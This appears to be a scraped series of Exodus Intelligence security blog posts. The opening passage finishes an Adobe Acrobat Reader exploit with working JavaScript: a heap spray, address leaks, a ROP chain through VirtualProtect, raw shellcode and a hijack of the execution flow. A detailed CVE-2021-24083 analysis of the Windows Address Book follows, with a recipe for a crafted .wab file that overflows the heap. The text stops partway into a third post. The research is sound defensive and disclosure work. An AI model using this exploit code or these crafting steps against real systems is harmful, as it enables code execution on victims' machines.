        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allowΒ  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.


function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,


    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);


    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);


function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.


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The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book

5 August 2021 at 12:26

By Eneko Cruz Elejalde


This post analyzes a heap-buffer overflow in Microsoft Windows Address Book. Microsoft released an advisory for this vulnerability for the 2021 February patch Tuesday. This post will go into detail about what Microsoft Windows Address Book is, the vulnerability itself, and the steps to craft a proof-of-concept exploit that crashes the vulnerable application.

Windows Address Book

Windows Address Book is a part of the Microsoft Windows operating system and is a service that provides users with a centralized list of contacts that can be accessed and modified by both Microsoft and third party applications. The Windows Address Book maintains a local database and interface for finding and editing information about contacts, and can query network directory servers using Lightweight Directory Access Protocol (LDAP). The Windows Address Book was introduced in 1996 and was later replaced by Windows Contacts in Windows Vista and subsequently by the People App in Windows 10.

The Windows Address Book provides an API that enables other applications to directly use its database and user interface services to enable services to access and modify contact information. While Microsoft has replaced the application providing the Address Book functionality, newer replacements make use of old functionality and ensure backwards compatibility. The Windows Address Book functionality is present in several Windows Libraries that are used by Windows 10 applications, including Outlook and Windows Mail. In this way, modern applications make use of the Windows Address Book and can even import address books from older versions of Windows.


A heap-buffer overflow vulnerability exists within the SecurityCheckPropArrayBuffer() function within wab32.dll when processing nested properties of a contact. The network-based attack vector involves enticing a user to open a crafted .wab file containing a malicious composite property in a WAB record.


The vulnerability analysis that follows is based on Windows Address Book Contacts DLL (wab32.dll) version 10.0.19041.388 running on Windows 10 x64.

The Windows Address Book Contacts DLL (i.e. wab32.dll) provides access to the Address Book API and it is used by multiple applications to interact with the Windows Address Book. The Contacts DLL handles operations related to contact and identity management. Among others, the Contacts DLL is able to import an address book (i.e, a WAB file) exported from an earlier version of the Windows Address Book.

Earlier versions of the Windows Address Book maintained a database of identities and contacts in the form of a .wab file. While current versions of Windows do not use a .wab file by default anymore, they allow importing a WAB file from an earlier installation of the Windows Address Book.

There are multiple ways of importing a WAB file into the Windows Address Book, but it was observed that applications rely on the Windows Contacts Import Tool (i.e, C:\Program Files\Windows Mail\wabmig.exe) to import an address book. The Import Tool loads wab32.dll to handle loading a WAB file, extracting relevant contacts, and importing them into the Windows Address Book.

WAB File Format

The WAB file format (commonly known as Windows Address Book or Outlook Address Book) is an undocumented and proprietary file format that contains personal identities. Identities may in turn contain contacts, and each contact might contain one or more properties.

Although the format is undocumented, the file-format has been partially reverse-engineered by a third party. The following structures were obtained from a combination of a publicly available third-party application and the disassembly of wab32.dll. Consequently, there may be inaccuracies in structure definitions, field names, and field types.

The WAB file has the following structure:

Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------
0x0         16                Magic Number            Sixteen magic bytes
0x10        4                 Count 1                 Unknown Integer
0x14        4                 Count 2                 Unknown Integer
0x18        16                Table Descriptor 1      Table descriptor
0x28        16                Table Descriptor 2      Table descriptor
0x38        16                Table Descriptor 3      Table descriptor
0x48        16                Table Descriptor 4      Table descriptor
0x58        16                Table Descriptor 5      Table descriptor
0x68        16                Table Descriptor 6      Table descriptor

All multi-byte fields are represented in little-endian byte order unless otherwise specified. All string fields are in Unicode, encoded in the UTF16-LE format.

The Magic Number field contains the following sixteen bytes: 9c cb cb 8d 13 75 d2 11 91 58 00 c0 4f 79 56 a4. While some sources list the sequence of bytes 81 32 84 C1 85 05 D0 11 B2 90 00 AA 00 3C F6 76 as a valid magic number for a WAB file, it was found experimentally that replacing the sequence of bytes prevents the Windows Address Book from processing the file.

Each of the six Table Descriptor fields numbered 1 through 6 has the following structure:

Offset    Length    Field    Description
-------   --------  -------  -------------------
0x0       4         Type     Type of table descriptor
0x4       4         Size     Size of the record described
0x8       4         Offset   Offset of the record described relative to the beginning of file
0xC       4         Count    Number of records present at offset

The following are examples of some known types of table descriptor:

  • Text Record (Type: 0x84d0): A record containing a Unicode string.
  • Index Record (Type: 0xFA0): A record that may contain several descriptors to WAB records.

Each text record has the following structure:

Offset   Length (bytes)    Field          Description
------   --------------    ------------   -------------------
0x0      N                 Content        Text content of the record; a null terminated UNICODE string
0x0+N    0x4               RecordId       A record identifier for the text record 

Similarly, each index record has the following structure

Offset      Length (bytes)    Field        Description
---------   --------------    ----------   -------------------
0x0         4                 RecordId     A record identifier for the index record
0x4         4                 Offset       Offset of the record relative to the beginning of the file

Each entry in the index record (i.e, each index record structure in succession) has an offset that points to a WAB record.

WAB Records

A WAB record is used to describe a contact. It contains fields such as email addresses and phone numbers stored in properties, which may be of various types such as string, integer, GUID, and timestamp. Each WAB record has the following structure:

Offset      Length   Field              Description
---------   ------   ---------------    -------------------
0x0         4        Unknown1           Unknown field
0x4         4        Unknown2           Unknown field
0x8         4        RecordId           A record identifier for the WAB record
0xC         4        PropertyCount      The number of properties contained in RecordProperties
0x10        4        Unknown3           Unknown field 
0x14        4        Unknown4           Unknown field 
0x18        4        Unknown5           Unknown field 
0x1C        4        DataLen            The length of the RecordProperties field (M)
0x20        M        RecordProperties   Succession of subproperties belonging to the WAB record

The following fields are relevant:

  • The RecordProperties field is a succession of record property structures.
  • The PropertyCount field indicates the number of properties within the RecordProperties field.

Record properties can be either simple or composite.

Simple Properties

Simple properties have the following structure:

Offset      Length (bytes)    Field       Description
---------   --------------    ---------   -------------------
0x0         0x2               Tag         A property tag describing the type of the contents
0x2         0x2               Unknown     Unknown field
0x4         0x4               Size        Size in bytes of Value member (X)
0x8         X                 Value       Property value or content

Tags of simple properties are smaller than 0x1000, and include the following:

Tag Name        Tag Value    Length      Description
---------       -----------  ---------   -------------------
PtypInteger16   0x00000002   2           A 16-bit integer
PtypInteger32   0x00000003   4           A 32-bit integer
PtypFloating32  0x00000004   4           A 32-bit floating point number
PtypFloating64  0x00000005   8           A 64-bit floating point number
PtypBoolean     0x0000000B   2           Boolean, restricted to 1 or 0
PtypString8     0x0000001E   Variable    A string of multibyte characters in externally specified
                                         encoding with terminating null character (single 0 byte)
PtypBinary      0x00000102   Variable    A COUNT field followed by that many bytes
PtypString      0x0000001F   Variable    A string of Unicode characters in UTF-16LE format encoding
                                         with terminating null character (0x0000).
PtypGuid        0x00000048   16          A GUID with Data1, Data2, and Data3 filds in little-endian
PtypTime        0x00000040   8           A 64-bit integer representing the number of 100-nanosecond
                                         intervals since January 1, 1601
PtypErrorCode   0x0000000A   4           A 32-bit integer encoding error information

Note the following:

  • The aforementioned list is not exhaustive. For more property tag definitions, see this.
  • The value of PtypBinary is prefixed by a COUNT field, which counts 16-bit words.
  • In addition to the above, the following properties also exist; their usage in WAB is unknown.
    • PtypEmbeddedTable (0x0000000D): The property value is a Component Object Model (COM) object.
    • PtypNull (0x00000001): None: This property is a placeholder.
    • PtypUnspecified (0x00000000): Any: this property type value matches any type;

Composite Properties

Composite properties have the following structure:

Offset  Length     Field             Description
------  ---------  ----------------- -------------------
0x0     0x2        Tag               A property tag describing the type of the contents
0x2     0x2        Unknown           Unknown field
0x4     0x4        NestedPropCount   Number of nested properties contained in the current WAB property
0x8     0x4        Size              Size in bytes of Value member (X)
0xC     X          Value             Property value or content

Tags of composite properties are greater than or equal to 0x1000, and include the following:

Tag Name                Tag Value
---------               ----------
PtypMultipleInteger16   0x00001002
PtypMultipleInteger32   0x00001003
PtypMultipleString8     0x0000101E
PtypMultipleBinary      0x00001102
PtypMultipleString      0x0000101F
PtypMultipleGuid        0x00001048
PtypMultipleTime        0x00001040

The Value field of each composite property contains NestedPropCount number of Simple properties of the corresponding type.

In case of fixed-sized properties (PtypMultipleInteger16, PtypMultipleInteger32, PtypMultipleGuid, and PtypMultipleTime), the Value field of a composite property contains NestedPropCount number of the Value field of the corresponding Simple property.

For example, in a PtypMultipleInteger32 structure with NestedPropCount of 4:

  • The Size is always 16.
  • The Value contains four 32-bit integers.

In case of variable-sized properties (PtypMultipleString8, PtypMultipleBinary, and PtypMultipleString), the Value field of the composite property contains NestedPropCount number of Size and Value fields of the corresponding Simple property.

For example, in a PtypMultipleString structure with NestedPropCount of 2 containing the strings β€œfoo” and β€œbar” in Unicode:

  • The Size is 14 00 00 00.
  • The Value field contains a concatenation of the following two byte-strings:
    • β€œfoo” encoded with a four-byte length: 06 00 00 00 66 00 6f 00 6f 00.
    • β€œbar” encoded with a four-byte length: 06 00 00 00 62 00 61 00 72 00.

Technical Details

The vulnerability in question occurs when a malformed Windows Address Book in the form of a WAB file is imported. When a user attempts to import a WAB file into the Windows Address Book, the method WABObjectInternal::Import() is called, which in turn calls ImportWABFile(). For each contact inside the WAB file, ImportWABFile() performs the following nested calls: ImportContact(), CWABStorage::ReadRecord(), ReadRecordWithoutLocking(), and finally HrGetPropArrayFromFileRecord(). This latter function receives a pointer to a file as an argument and reads the contact header and extracts PropertyCount and DataLen. The function HrGetPropArrayFromFileRecord() in turn calls SecurityCheckPropArrayBuffer() to perform security checks upon the imported file and HrGetPropArrayFromBuffer() to read the contact properties into a property array.

The function HrGetPropArrayFromBuffer() relies heavily on the correctness of the checks performed by SecurityCheckPropArrayBuffer(). However, the function fails to implement security checks upon certain property types. Specifically, SecurityCheckPropArrayBuffer() may skip checking the contents of nested properties where the property tag is unknown, while the function HrGetPropArrayFromBuffer() continues to process all nested properties regardless of the security check. As a result, it is possible to trick the function HrGetPropArrayFromBuffer() into parsing an unchecked contact property. As a result of parsing such a property, the function HrGetPropArrayFromBuffer() can be tricked into overflowing a heap buffer.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference markers denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

The following is the pseudocode of the function HrGetPropArrayFromFileRecord:


if ( !(unsigned int)SecurityCheckPropArrayBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3]) )

    result = 0x8004011b;        // Error
    goto LABEL_25;              // Return prematurely

  result = HrGetPropArrayFromBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3], 0, a7);

At [1] the function SecurityCheckPropArrayBuffer() is called to perform a series of security checks upon the buffer received and the properties contained within. If the check is positive, then the input is trusted and processed by calling HrGetPropArrayFromBuffer() at [3]. Otherwise, the function returns with an error at [2].

The following is the pseudocode of the function SecurityCheckPropArrayBuffer():

    __int64 __fastcall SecurityCheckPropArrayBuffer(unsigned __int8 *buffer_ptr, unsigned int buffer_length, int header_dword_3)
      unsigned int security_check_result; // ebx
      unsigned int remaining_buffer_bytes; // edi
      int l_header_dword_3; // er15
      unsigned __int8 *ptr_to_buffer; // r9
      int current_property_tag; // ecx
      __int64 c_dword_2; // r8
      unsigned int v9; // edi
      int VA; // ecx
      int VB; // ecx
      int VC; // ecx
      int VD; // ecx
      int VE; // ecx
      int VF; // ecx
      int VG; // ecx
      int VH; // ecx
      signed __int64 res; // rax
      _DWORD *ptr_to_dword_1; // rbp
      unsigned __int8 *ptr_to_dword_0; // r14
      unsigned int dword_2; // eax
      unsigned int v22; // edi
      int v23; // esi
      int v24; // ecx
      unsigned __int8 *c_ptr_to_property_value; // [rsp+60h] [rbp+8h]
      unsigned int v27; // [rsp+68h] [rbp+10h]
      unsigned int copy_dword_2; // [rsp+70h] [rbp+18h]

      security_check_result = 0;
      remaining_buffer_bytes = buffer_length;
      l_header_dword_3 = header_dword_3;
      ptr_to_buffer = buffer_ptr;
      if ( header_dword_3 )                      
        while ( remaining_buffer_bytes > 4 )        


          if ( *(_DWORD *)ptr_to_buffer & 0x1000 )  


            current_property_tag = *(unsigned __int16 *)ptr_to_buffer;
            if ( current_property_tag == 0x1102 ||                    
                 (unsigned int)(current_property_tag - 0x101E) <= 1 ) 

              ptr_to_dword_1 = ptr_to_buffer + 4;                     
              ptr_to_dword_0 = ptr_to_buffer;
              if ( remaining_buffer_bytes < 0xC )                     
                return security_check_result;                         
              dword_2 = *((_DWORD *)ptr_to_buffer + 2);
              v22 = remaining_buffer_bytes - 0xC;
              if ( dword_2 > v22 )                                     
                return security_check_result;                         
              ptr_to_buffer += 12;
              copy_dword_2 = dword_2;
              remaining_buffer_bytes = v22 - dword_2;
              c_ptr_to_property_value = ptr_to_buffer;                
              v23 = 0;                                                
              if ( *ptr_to_dword_1 > 0u )
                while ( (unsigned int)SecurityCheckSingleValue(
                                        *(_DWORD *)ptr_to_dword_0,
                                        Β©_dword_2) )
                  if ( (unsigned int)++v23 >= *ptr_to_dword_1 )       
                    ptr_to_buffer = c_ptr_to_property_value;
                    goto LABEL_33;
                return security_check_result;

              if ( remaining_buffer_bytes < 0xC )
                return security_check_result;
              c_dword_2 = *((unsigned int *)ptr_to_buffer + 2);       
              v9 = remaining_buffer_bytes - 12;
              if ( (unsigned int)c_dword_2 > v9 )                     
                return security_check_result;                         
              remaining_buffer_bytes = v9 - c_dword_2;
              VA = current_property_tag - 0x1002;                     
              if ( VA )
                VB = VA - 1;
                if ( VB && (VC = VB - 1) != 0 )
                  VD = VC - 1;
                  if ( VD && (VE = VD - 1) != 0 && (VF = VE - 1) != 0 && (VG = VF - 13) != 0 && (VH = VG - 44) != 0 )
                    res = VH == 8 ? 16i64 : 0i64;
                    res = 8i64;
                  res = 4i64;
                res = 2i64;
              if ( (unsigned int)c_dword_2 / *((_DWORD *)ptr_to_buffer + 1) != res ) 
                return security_check_result;                                        

              ptr_to_buffer += c_dword_2 + 12;


            if ( remaining_buffer_bytes < 4 )       
              return security_check_result;
            v24 = *(_DWORD *)ptr_to_buffer;         
            c_ptr_to_property_value = ptr_to_buffer + 4;// new exe: v13 = buffer_ptr + 4;
            v27 = remaining_buffer_bytes - 4;       
            if ( !(unsigned int)SecurityCheckSingleValue(v24, &c_ptr_to_property_value, &v27) )
              return security_check_result;
            remaining_buffer_bytes = v27;
            ptr_to_buffer = c_ptr_to_property_value;
          if ( !--l_header_dword_3 )
      if ( !l_header_dword_3 )
        security_check_result = 1;
      return security_check_result;

At [4] the tag of the property being processed is checked. The checks performed depend on whether the property processed in each iteration is a simple or a composite property. For simple properties (i.e, properties with tag lower than 0x1000), execution continues at [8]. The following checks are done for simple properties:

  1. If the remaining number of bytes in the buffer is fewer than 4, the function returns with an error.
  2. A pointer to the property value is obtained and SecurityCheckSingleValue() is called to perform a security check upon the simple property and its value. SecurityCheckSingleValue() performs a security check and increments the pointer to point at the next property in the buffer, so that SecurityCheckPropArrayBuffer() can check the next property on the next iteration.
  3. The number of total properties is decremented and compared to zero. If equal to zero, then the function returns successfully. If different, the next iteration of the loop checks the next property.

Similarly, for composite properties (i.e, properties with tag equal or higher than 0x1000) execution continues at [5] and the following is done.

For variable length composite properties (if the property tag is equal to 0x1102 (PtypMultipleBinary) or equal or smaller than 0x101f (PtypMultipleString)), the code at [6] does the following:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size field of the property is compared to the remaining buffer length to avoid overrunning the buffer.
  3. For each nested property, the function SecurityCheckSingleValue() is called. It:
    1. Performs a security check on the nested property.
    2. Advances the pointer to the buffer held by the caller, in order to point to the next nested property.
  4. The loop runs until the number of total properties in the contact (decremented in each iteration) is zero.

For fixed-length composite properties (if the property tag in question is different from 0x1102 (PtypMultipleBinary) and larger than 0x101f (PtypMultipleString)), the following happens starting at [7]:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size is compared to the remaining buffer length to avoid overrunning the buffer.
  3. The size of each nested property, which depends only on the property tag, is calculated from the parent property tag.
  4. The Size is divided by NestedPropCount to obtain the size of each nested property.
  5. The function returns with an error if the calculated subproperty size is different from the property size deduced from parent property tag.
  6. The buffer pointer is incremented by the size of the parent property value to point to the next property.

Unknown or non-processable property types are assigned the nested property size 0x0.

It was observed that if the calculated property size is zero, the buffer pointer is advanced by the size of the property value, as described by the header. The buffer is advanced regardless of the property size and by advancing the buffer, the security check permits the value of the parent property (which may include subproperties) to stay unchecked. For the security check to pass the result of the division performed on Step 4 for fixed-length composite properties must be zero. Therefore for an unknown or non-processable property to pass the security check, NestedPropCount must be larger than Size. Note that since the size of any property in bytes is at least two, NestedPropCount must always be no larger than half of Size, and therefore, the aforementioned division must never be zero in benign cases.

After the checks have concluded, the function returns zero for a failed check and one for a passed check.

Subsequently, the function HrGetPropArrayFromFileRecord() calls HrGetPropArrayFromBuffer(), which aims to collect the properties into an array of _SPropValue structs and return it to the caller. The _SPropValue array has a length equal of the number of properties (as given by the contact header) and is allocated in the heap through a call to LocalAlloc(). The number of properties is multiplied by sizeof(_SPropValue) to yield the total buffer size. The following fragment shows the allocation taking place:

    if ( !property_array_r )
        ret = -2147024809;
        goto LABEL_71;
    *property_array_r = 0i64;
    header_dword_3_1 = set_to_zero + header_dword_3;


    if ( (unsigned int)header_dword_3_1 < header_dword_3       
      || (unsigned int)header_dword_3_1 > 0xAAAAAAA            
      || (v10 = (unsigned int)header_dword_3_1,                               
          property_array = (struct _SPropValue *)LocalAlloc(
                                                   0x18 * header_dword_3_1),
                                                   // sizeof(_SPropValue) * n_properties_in_binary
        (*property_array_r = property_array) == 0i64) )
        ret = 0x8007000E;
        goto LABEL_71;

An allocation of sizeof(_SPropValue) * n_properties_in_binary can be observed at [9]. Immediately after, each of the property structures are initialized and their property tag member is set to 1. After initialization, the buffer, on which security checks have already been performed, is processed property by property, advancing the property a pointer to the next property with the property header and value sizes provided by the property in question.

If the property processed by the specific loop iteration is a simple property, the following code is executed:

    if ( !_bittest((const signed int *)Β€t_property_tag, 0xCu) )
      if ( v16 < 4 )
      dword_1 = wab_ulong_buffer_full[1];
      ptr_to_dword_2 = (char *)(wab_ulong_buffer_full + 2);
      v38 = v16 - 4;
      if ( (unsigned int)dword_1 > v38 )
      current_property_tag = (unsigned __int16)current_property_tag;
      if ( (unsigned __int16)current_property_tag > 0xBu )


        v39 = current_property_tag - 0x1E;
        if ( !v39 )
          goto LABEL_79;
        v40 = v39 - 1;
        if ( !v40 )
          goto LABEL_79;
        v41 = v40 - 0x21;
        if ( !v41 )
          goto LABEL_56;
        v42 = v41 - 8;
        if ( v42 )
          if ( v42 != 0xBA )
            goto LABEL_56;
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_1);
          if ( !(*property_array_r)[p_idx].Value.bin.lpb )
          (*property_array_r)[p_idx].Value.l = dword_1;
          v44 = *(&(*property_array_r)[p_idx].Value.at + 1);

          v43 = dword_1;
          (*property_array_r)[p_idx].Value.cur.int64 = (LONGLONG)LocalAlloc(0x40u, dword_1);
          v44 = (*property_array_r)[p_idx].Value.dbl;
          if ( v44 == 0.0 )
        memcpy_0(*(void **)&v44, ptr_to_dword_2, v43);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[v43];

        memcpy_0(&(*property_array_r)[v15].Value, ptr_to_dword_2, dword_1);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[dword_1];
      remaining_bytes_to_process = v38 - dword_1;
      goto NEXT_PROPERTY;


        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
          return 0;

At [10] the property tag is extracted and compared with several constants. If the property tag is 0x1e (PtypString8), 0x1f (PtypString), or 0x48 (PtypGuid), then execution continues at [11]. If the property tag is 0x40 (PtypTime) or is not recognized, execution continues at [12]. The memcpy call at [12] is prone to a heap overflow.

Conversely, if the property being processed in the specific loop iteration is not a simple property, the following code is executed. Notably, when the following code is executed, the pointer DWORD* wab_ulong_buffer_full points to the property tag of the property being processed. Regardless of which composite property is being processed, before the property tag is identified the buffer is advanced to point to the beginning of the property value, which is at the 4th 32-bit integer.


    if ( v16 < 4 )
    c_dword_1 = wab_ulong_buffer_full[1];
    v19 = v16 - 4;
    if ( v19 < 4 )
    dword_2 = wab_ulong_buffer_full[2];
    wab_ulong_buffer_full += 3;                     

    remaining_bytes_to_process = v19 - 4;


    if ( (unsigned __int16)current_property_tag >= 0x1002u )
    if ( (unsigned __int16)current_property_tag <= 0x1007u || (unsigned __int16)current_property_tag == 0x1014 )
        goto LABEL_80;
    if ( (unsigned __int16)current_property_tag == 0x101E )
    if ( (unsigned __int16)current_property_tag == 0x101F )
    if ( ((unsigned __int16)current_property_tag - 0x1040) & 0xFFFFFFF7 )
        if ( (unsigned __int16)current_property_tag == 0x1102 )


        (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_2);
        if ( !(*property_array_r)[p_idx].Value.bin.lpb )
        (*property_array_r)[p_idx].Value.l = c_dword_1;
        if ( (unsigned int)dword_2 > remaining_bytes_to_process )
        memcpy_0((*property_array_r)[p_idx].Value.bin.lpb, wab_ulong_buffer_full, dword_2);
        wab_ulong_buffer_full = (ULONG *)((char *)wab_ulong_buffer_full + dword_2);
        remaining_bytes_to_process -= dword_2;

        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
        return 0;

After the buffer has been advanced at [13], the property tag is compared with several constants starting at [14]. Finally, the code fragment at [15] attempts to process a composite property (i.e. >= 0x1000) with a tag not contemplated by the previous constants.

Although the processing logic of each type of property is irrelevant, an interesting fact is that if the property tag is not recognized, the buffer pointer has still been advanced to the end of the end of its header, and it’s never retracted. This happens if all of the following conditions are met:

  • The property tag is larger or equal than 0x1002.
  • The property tag is larger than 0x1007.
  • The property tag is different from 0x1014.
  • The property tag is different from 0x101e.
  • The property tag is different from 0x101f.
  • The property tag is different from 0x1102.
  • The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is nonzero.

Interestingly, if all of the above conditions are met, the property header of the composite property is skipped, and the next loop iteration will interpret its property body as a different property.

Therefore, it is possible to overflow the _SPropValue array allocated in the heap by HrGetPropArrayFromBuffer() by using the following observations:

  • A specially crafted composite unknown or non-processable property can be made to bypass security checks if NestedPropCount is larger than Size.
  • HrGetPropArrayFromBuffer() can be made to interpret the Value of a specially crafted property as a separate property.


In order to create a malicious WAB file from a benign WAB file, export a valid WAB file from an instance of the Windows Address Book. It is noted that Outlook Express on Windows XP includes the ability to export contacts as a WAB file.

The benign WAB file can be modified to make it malicious by altering a contact inside it to have the following characteristics:

  • A nested property containing the following:
  • A tag of an unknown or unprocessable type, for example the tag 0x1058, with the following conditions:
    • Must be larger or equal than 0x1002.
    • Must be larger than 0x1007.
    • Must be different from 0x1014, 0x101e, 0x101f, and 0x1102.
    • The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is non-zero.
    • Must be different from 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1014, 0x1040, and 0x1048.
    • NestedPropCount is larger than Size.
    • The Value of the composite property is empty.
    • A malicious simple property containing the following:
    • A property tag different from 0x1e, 0x1f, 0x40 and 0x48. For example, the tag 0x0.
    • The Size value is larger than 0x18 x NestedPropCount in order to overflow the _SPropValue array buffer.
    • An unspecified number of trailing bytes, that will overflow the _SPropValue array buffer.

Finally, when an attacker tricks an unsuspecting user into importing the specially crafted WAB file, the vulnerability is triggered and code execution could be achieved. Failed exploitation attempts will most likely result in a crash of the Windows Address Book Import Tool.

Due to the presence of ASLR and a lack of a scripting engine, we were unable to obtain arbitrary code execution in Windows 10 from this vulnerability.


Hopefully you enjoyed this dive into CVE-2021-24083, and if you did, go ahead and check out our other blog post on a use-after-free vulnerability in Adobe Acrobat Reader DC. If you haven’t already, make sure to follow us on Twitter to keep up to date with our work. Happy hacking!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book appeared first on Exodus Intelligence.

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

28 June 2021 at 10:46

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to versions 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.


A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.


Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

